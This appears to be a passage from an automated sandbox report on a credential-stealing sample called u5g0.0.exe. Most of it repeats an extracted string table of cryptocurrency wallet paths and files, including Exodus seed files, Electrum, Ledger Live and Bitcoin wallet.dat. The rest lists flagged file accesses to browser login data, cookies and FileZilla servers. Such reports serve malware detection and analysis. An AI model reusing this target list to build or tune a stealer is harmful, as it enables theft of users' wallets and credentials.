Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\SysWOW64\sppc.dllaming\Exodus\exodus.wallet\seed.seco
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\SysWOW64\sppc.dllaming\Exodus\exodus.wallet\seed.seco
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2073657722.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\SysWOW64\sppc.dllaming\Exodus\exodus.wallet\seed.seco
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
